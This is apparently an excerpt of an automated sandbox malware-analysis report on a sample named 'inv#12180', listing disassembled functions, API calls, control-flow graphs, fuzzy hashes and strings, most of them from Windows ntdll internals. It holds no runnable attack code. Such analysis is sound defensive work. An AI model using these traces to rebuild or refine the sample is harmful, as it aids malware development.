                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d958bfab99561d7f877a87a2f5ac80985c95e08c9043c565629f8e8da83b79c2
                                                • Instruction ID: 8f2177f3cb88557ca8ee605ed5f4a45cbb9dbd714cc566bdece1594410aa0a2d
                                                • Opcode Fuzzy Hash: d958bfab99561d7f877a87a2f5ac80985c95e08c9043c565629f8e8da83b79c2
                                                • Instruction Fuzzy Hash: 5C90023160550502D10071584954746100997E4201F65C412A0425569DC7A58A516AB2
                                                Function 008F1B91 Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 216 8f1b91-8f1b93 217 8f1b95 216->217 218 8f1c02-8f1c31 216->218 220 8f1bf9-8f1c00 217->220 221 8f1b97-8f1ba7 217->221 219 8f1c32-8f1c3a 218->219 223 8f1c8e-8f1c8f 219->223 220->218 220->219 225 8f1ba9-8f1be4 221->225 226 8f1b56 221->226 227 8f1c75-8f1c7d 223->227 228 8f1c91-8f1ca8 call 8f1170 223->228 225->220 230 8f1b58-8f1b83 226->230 231 8f1b05-8f1b07 226->231 232 8f1c7f-8f1c83 227->232 233 8f1c84 227->233 240 8f1cb0-8f1cc3 228->240 237 8f1b84-8f1b90 230->237 236 8f1b09-8f1b0d 231->236 231->237 232->233 238 8f1c89 233->238 239 8f1c86 233->239 236->226 237->216 238->223 239->238 240->240 241 8f1cc5 240->241 242 8f1cc7-8f1cdf 241->242 243 8f1ce2-8f1ce8 242->243 244 8f1ce1 242->244 243->242 245 8f1cea-8f1cef 243->245 244->243 246 8f1cf0-8f1d03 245->246 246->246 247 8f1d05 246->247 248 8f1d07-8f1d1f 247->248 249 8f1d22-8f1d28 248->249 250 8f1d21 248->250 249->248 251 8f1d2a-8f1d58 call 8f1ed0 249->251 250->249 254 8f1d60-8f1d71 251->254 254->254 255 8f1d73-8f1d7f call 8f1000 254->255 257 8f1d84-8f1d8a call 920173 255->257 258 8f1d8c-8f1d99 257->258 259 8f1da0-8f1db1 258->259 259->259 260 8f1db3-8f1dca 259->260 261 8f1dd0-8f1dd9 260->261 261->261 262 8f1ddb-8f1de3 261->262
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2501936553.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000000.00000002.2501909320.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_8f0000_inv#12180.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: gfff
                                                • API String ID: 0-1553575800
                                                • Opcode ID: ffc2481fce70498abf24348ff62ec35e8294febb70a0fb597abd4f61d11988e8
                                                • Instruction ID: 1388da906613e11c84eeedc1a4b18da8536df49d6fc8a0a2962c86e05a6e4bb7
                                                • Opcode Fuzzy Hash: ffc2481fce70498abf24348ff62ec35e8294febb70a0fb597abd4f61d11988e8
                                                • Instruction Fuzzy Hash: EF71EC72A0421D8FDB1D897C8CAA6F47B59FBA1314F1852AFEA86DF282E4114D058781
                                                Function 009044C1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 0090456A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2501936553.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000000.00000002.2501909320.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_8f0000_inv#12180.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 17O3k-2I$17O3k-2I
                                                • API String ID: 1836367815-2455829943
                                                • Opcode ID: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                • Instruction ID: 666df755a48141730d755246d450ffc5bcc7e8faa9f707496cfeaa42ab7006ee
                                                • Opcode Fuzzy Hash: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                • Instruction Fuzzy Hash: 1D112BB2D0414D7ADB10DBE08C41EEE7F7CEF40354F044069FA54A7141D3348A468BA1
                                                Function 009044F3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 18 9044f3-904505 19 90450d-90455d call 91f6b3 call 907ca3 call 8f4873 call 9152e3 18->19 20 904508 call 91eca3 18->20 29 90457d-904583 19->29 30 90455f-90456e PostThreadMessageW 19->30 20->19 30->29 31 904570-90457a 30->31 31->29
                                                APIs
                                                • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 0090456A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2501936553.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000000.00000002.2501909320.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_8f0000_inv#12180.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 17O3k-2I$17O3k-2I
                                                • API String ID: 1836367815-2455829943
                                                • Opcode ID: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                • Instruction ID: cb76860c88b87ef95543e0764f6921eb04027c2e114d994252968215a70d600f
                                                • Opcode Fuzzy Hash: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                • Instruction Fuzzy Hash: 2501D6B2D0024C7EDB10ABE48C82DEF7B7CDF81794F058065FA14A7141D6749E468BA1
                                                Function 0091CEB3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 193 91ceb3-91cef4 call 8f4903 call 91dd73 RtlFreeHeap
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,00018623,00000007,00000000,00000004,00000000,00907514,000000F4), ref: 0091CEEF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2501936553.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000000.00000002.2501909320.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_8f0000_inv#12180.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                • Instruction ID: 9b48b65ae79f2481f9f1e93481db2c00629d8c3ffb57629498ad9e569b748ac6
                                                • Opcode Fuzzy Hash: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                • Instruction Fuzzy Hash: D3E06DB1704208BBD610EE58EC42FEB37ACEFC8710F004009FA18A7282C7B1B9118BB5
                                                Function 0091CE63 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 188 91ce63-91cea7 call 8f4903 call 91dd73 RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,0090EA4E,?,?,00000000,?,0090EA4E,?,?,?), ref: 0091CEA2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2501936553.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000000.00000002.2501909320.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_8f0000_inv#12180.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                • Instruction ID: 0529540b1e5266d38aac08f06842bb7e34ef3e1dddf3948229969bbfd48c620b
                                                • Opcode Fuzzy Hash: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                • Instruction Fuzzy Hash: 02E06DB6214248BBD614EE68DC42FAB77ACEFC8710F004049FA08A7242C7B0B91086B5
                                                Function 0091CF03 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 203 91cf03-91cf38 call 8f4903 call 91dd73 ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,004D1854,?,?,004D1854), ref: 0091CF33
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2501936553.00000000008F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000000.00000002.2501909320.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_8f0000_inv#12180.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                • Instruction ID: ee81dd2dc08636b1d8d4d2d5f85e5430ba421492de4217fb14b572fb691e75d2
                                                • Opcode Fuzzy Hash: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
                                                • Instruction Fuzzy Hash: 0BE086353006187BC220EA59DC01F9B77ACDFC5710F104055FA08A7186D6B0791087F5
                                                Function 014A2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 208 14a2c0a-14a2c0f 209 14a2c1f-14a2c26 LdrInitializeThunk 208->209 210 14a2c11-14a2c18 208->210
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 26719528c64f74ac66b23b91eabb190e336e432802ab8b9d9f89ace581b62e12
                                                • Instruction ID: 22af48bf46fb03ab5a668b10df79b43696c230413563148f3e9e22886e6d5745
                                                • Opcode Fuzzy Hash: 26719528c64f74ac66b23b91eabb190e336e432802ab8b9d9f89ace581b62e12
                                                • Instruction Fuzzy Hash: B4B09B719025C5C5DA11E7644A08B17790477E0701F56C063D3031653F4778C1D1F675

                                                Non-executed Functions

                                                Function 014E2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2160512332
                                                • Opcode ID: 8efb48efce4517b008cc7599976e4dbb8e30dc932edcc46f6836b70a019928f0
                                                • Instruction ID: 89520a9613e3aae18be89339040586f9481edf069c5c6a92bf5409d6175170bf
                                                • Opcode Fuzzy Hash: 8efb48efce4517b008cc7599976e4dbb8e30dc932edcc46f6836b70a019928f0
                                                • Instruction Fuzzy Hash: 5C928E71604342AFE721CF29C848F6BBBE8BB94751F04491EFA94D7261D7B0E845CB92
                                                Function 014568B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim user DLL$LdrpGetShimuserInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_Initializeuser$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-3089669407
                                                • Opcode ID: 8976af18729baed180552d4d2a08e3358e9cc4bc772d741fe22896e55e22b1a5
                                                • Instruction ID: dc5a3799c21ecb0619554f9e9e57c6af42fe03f5e9bbc10dc0ddbeabae5fafef
                                                • Opcode Fuzzy Hash: 8976af18729baed180552d4d2a08e3358e9cc4bc772d741fe22896e55e22b1a5
                                                • Instruction Fuzzy Hash: 328143B2D01219BF8B11EAD5DDD0DEE77BDAB287107564427FA11FB120E630DE099BA0
                                                Function 01505910 Relevance: 18.5, Strings: 14, Instructions: 963COMMON
                                                Download Yara Rule
                                                Strings
                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 01505A84
                                                • PreferredUILanguages, xrefs: 015063D1
                                                • @, xrefs: 015061B0
                                                • @, xrefs: 015063A0
                                                • PreferredUILanguagesPending, xrefs: 015061D2
                                                • LanguageConfiguration, xrefs: 01506420
                                                • InstallLanguageFallback, xrefs: 01506050
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0150635D
                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 01505FE1
                                                • @, xrefs: 01506027
                                                • Control Panel\Desktop, xrefs: 0150615E
                                                • LanguageConfigurationPending, xrefs: 01506221
                                                • @, xrefs: 01506277
                                                • @, xrefs: 0150647A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                • API String ID: 0-1325123933
                                                • Opcode ID: 637381b1a8983bd9567dd5971974821b9c5896592e5d3fc11f7a26da4558c3a0
                                                • Instruction ID: 381a2666f79be207ef80bb6476176698fa117a799370d2d950052cb4fc7f1745
                                                • Opcode Fuzzy Hash: 637381b1a8983bd9567dd5971974821b9c5896592e5d3fc11f7a26da4558c3a0
                                                • Instruction Fuzzy Hash: 99727C715183419FD322DFA9C840BAFBBE9BB98710F44492EFA85DB290E730D945CB52
                                                Function 01498620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                Download Yara Rule
                                                Strings
                                                • double initialized or corrupted critical section, xrefs: 014D5508
                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014D54E2
                                                • undeleted critical section in freed memory, xrefs: 014D542B
                                                • Critical section debug info address, xrefs: 014D541F, 014D552E
                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014D540A, 014D5496, 014D5519
                                                • Address of the debug info found in the active list., xrefs: 014D54AE, 014D54FA
                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014D54CE
                                                • Thread is in a state in which it cannot own a critical section, xrefs: 014D5543
                                                • 8, xrefs: 014D52E3
                                                • Thread identifier, xrefs: 014D553A
                                                • Invalid debug info address of this critical section, xrefs: 014D54B6
                                                • corrupted critical section, xrefs: 014D54C2
                                                • Critical section address., xrefs: 014D5502
                                                • Critical section address, xrefs: 014D5425, 014D54BC, 014D5534
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                • API String ID: 0-2368682639
                                                • Opcode ID: 115004b3040912dafb7b1c61d67e1a4c5c555217e532062016a86c7679397381
                                                • Instruction ID: bd02bfff3db6cdae4ed01297a7301b92892655a507b5c1389871c4e775607ce4
                                                • Opcode Fuzzy Hash: 115004b3040912dafb7b1c61d67e1a4c5c555217e532062016a86c7679397381
                                                • Instruction Fuzzy Hash: 2081AD70A40359EFEF20CF9AC854BAEBBB5BB08714F20411BF509BB261D771A945CB90
                                                Function 014929F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 014D261F
                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014D25EB
                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 014D2412
                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 014D2602
                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 014D2409
                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014D24C0
                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 014D2624
                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 014D2498
                                                • @, xrefs: 014D259B
                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 014D2506
                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014D22E4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                • API String ID: 0-4009184096
                                                • Opcode ID: 72c71ebb9a54348f2aa933839fe30f89d64a518e7faebacaa96858583944f886
                                                • Instruction ID: 12784437a4f9f6522e4506de17257365160f12ab263cc6a1169a2f4e849499f4
                                                • Opcode Fuzzy Hash: 72c71ebb9a54348f2aa933839fe30f89d64a518e7faebacaa96858583944f886
                                                • Instruction Fuzzy Hash: 3F0260B1D00229ABDF21DF54CC90FDAB7B8AB54314F4041EBE609A7261DBB09E85CF59
                                                Function 01490F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                • API String ID: 0-360209818
                                                • Opcode ID: 374c10d786541178869d57e8c513e933da4391735260470a469bae50c9f4d860
                                                • Instruction ID: e3823354d8e1deea2a9a071db58f665a692808225eb2a7ac56499cfdcbc60ad7
                                                • Opcode Fuzzy Hash: 374c10d786541178869d57e8c513e933da4391735260470a469bae50c9f4d860
                                                • Instruction Fuzzy Hash: 2E62A2B5E002258FEF24CF18C8517AABBB2AF95720F5581DBD949AB360D7325AD1CF40
                                                Function 01508B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                • API String ID: 0-2515994595
                                                • Opcode ID: c936072f5d3f84fc342779e0fa2ba4caacd6e63af0d806d882d6bd04d799d405
                                                • Instruction ID: 0d6e547467aa51dead8811ca23acb09d819a4ef4226561d45e13a250954044eb
                                                • Opcode Fuzzy Hash: c936072f5d3f84fc342779e0fa2ba4caacd6e63af0d806d882d6bd04d799d405
                                                • Instruction Fuzzy Hash: D551C4B19043059BD72ACF59C844FABBBE8FFD8354F184A1EE9958B190E770D604C792
                                                Function 015112ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                • API String ID: 0-3591852110
                                                • Opcode ID: 212c03d7c707c00110bb5a0e1e01be4618d9ab03eaa194a738a5e69190cb46f8
                                                • Instruction ID: 5b6933f772af079f43eab16c9fff61c33f330b4a1095fc9f710d27ef0fb1c943
                                                • Opcode Fuzzy Hash: 212c03d7c707c00110bb5a0e1e01be4618d9ab03eaa194a738a5e69190cb46f8
                                                • Instruction Fuzzy Hash: 9F128030600A469FE7268F39C485B7ABBF1FF19714F18889DEA868F656D774E840CB50
                                                Function 0147AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                • API String ID: 0-3197712848
                                                • Opcode ID: a60c2a56333a36f0116b1d47b1122856bd1bd5a8c0803480de4e9da5b81b093c
                                                • Instruction ID: 9f3f987b064cfa1ab9ec088b7e936aeb9a9a7a1dc7387398748a8c3e33c18a73
                                                • Opcode Fuzzy Hash: a60c2a56333a36f0116b1d47b1122856bd1bd5a8c0803480de4e9da5b81b093c
                                                • Instruction Fuzzy Hash: FB12EEB16083428BD325DB29C850BEBB7E1FF94B14F19091FE9859B3A1E730D945CB92
                                                Function 0145D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                • API String ID: 0-3532704233
                                                • Opcode ID: c62f5d831bc15e41e4b5796b81ffea9d86dd239f33fa7496bb9f518c8f471d6f
                                                • Instruction ID: 849e5fe4c19ea17e4837b61586dad8545a8b92b9932bd5c05e468602c853b527
                                                • Opcode Fuzzy Hash: c62f5d831bc15e41e4b5796b81ffea9d86dd239f33fa7496bb9f518c8f471d6f
                                                • Instruction Fuzzy Hash: C1B1BD719083169FD761DF68C480AAFBBE8AF98754F01092FF988D7321D730D9458BA2
                                                Function 01510CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                • API String ID: 0-1357697941
                                                • Opcode ID: 5a01d37b523f191541e4e5c02a43f561606db0df6b78c2176a54ec689510c674
                                                • Instruction ID: 1e81f44cfbd4c16f76dfc5562a7f37dd74b9f0dde2441d03d3f1a8cb112b5344
                                                • Opcode Fuzzy Hash: 5a01d37b523f191541e4e5c02a43f561606db0df6b78c2176a54ec689510c674
                                                • Instruction Fuzzy Hash: 85F11631A00646EFEB26CF69C081BAEBBF5FF09704F14445EE9859F296C734A985CB50
                                                Function 01510274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2502269063.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1430000_inv#12180.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                • API String ID: 0-1700792311
                                                • Opcode ID: 2dc1ab5d0f50b54b4289e7dc1b1a1d2829a37c842a6f210940cfeb06b8f0143b
                                                • Instruction ID: c993927b17c5b02068899127923d6a8de6965b621a37f742a1b0f436f09c725f
                                                • Opcode Fuzzy Hash: 2dc1ab5d0f50b54b4289e7dc1b1a1d2829a37c842a6f210940cfeb06b8f0143b
                                                • Instruction Fuzzy Hash: 44D1FC31600686DFEB22DF69C450AADBBF2FF5A700F19845AF8459F2A6D73499C1CB10
                                                Function 014E89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                Download Yara Rule
                                                Strings
